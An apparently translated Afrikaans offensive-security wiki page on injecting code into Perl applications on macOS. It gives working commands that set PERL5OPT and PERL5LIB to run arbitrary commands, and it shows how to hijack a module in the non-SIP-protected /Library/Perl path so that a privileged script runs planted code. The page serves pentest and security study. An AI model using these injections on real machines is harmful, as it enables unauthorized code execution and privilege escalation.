macOS Perl Applications Injection

Via PERL5OPT & PERL5LIB omgewingsveranderlike

Deur die omgewingsveranderlike PERL5OPT te gebruik, is dit moontlik om perl arbitrêre bevele uit te voer. Byvoorbeeld, skep hierdie skriffie:

#!/usr/bin/perl
print "Hello from the Perl script!\n";

Voer nou die omgewingsveranderlike uit en voer die perl skrips uit:

export PERL5OPT='-Mwarnings;system("whoami")'
perl test.pl # This will execute "whoami"

'n Ander opsie is om 'n Perl-module te skep (bv. /tmp/pmod.pm):

#!/usr/bin/perl
package pmod;
system('whoami');
1; # Modules must return a true value

En gebruik dan die omgewingsveranderlikes:

PERL5LIB=/tmp/ PERL5OPT=-Mpmod

Via afhanklikhede

Dit is moontlik om die afhanklikhede van die Perl wat loop, in die volgorde van die lêer te lys:

perl -e 'print join("\n", @INC)'

Wat sal iets soos die volgende teruggee:

/Library/Perl/5.30/darwin-thread-multi-2level
/Library/Perl/5.30
/Network/Library/Perl/5.30/darwin-thread-multi-2level
/Network/Library/Perl/5.30
/Library/Perl/Updates/5.30.3
/System/Library/Perl/5.30/darwin-thread-multi-2level
/System/Library/Perl/5.30
/System/Library/Perl/Extras/5.30/darwin-thread-multi-2level
/System/Library/Perl/Extras/5.30

Sommige van die teruggekeerde lêers bestaan selfs nie, maar /Library/Perl/5.30 bestaan wel, dit is nie beskerm deur SIP en dit is voor die lêers wat beskerm word deur SIP. Daarom kan iemand daardie lêer misbruik om skrips afhanklikhede daarin by te voeg sodat 'n hoë-privilege Perl-skrip dit kan laai.

Byvoorbeeld, as 'n skrip use File::Basename; invoer, sou dit moontlik wees om /Library/Perl/5.30/File/Basename.pm te skep om dit arbitrêre kode te laat uitvoer.

Verwysings

• https://www.youtube.com/watch?v=zxZesAN-TEk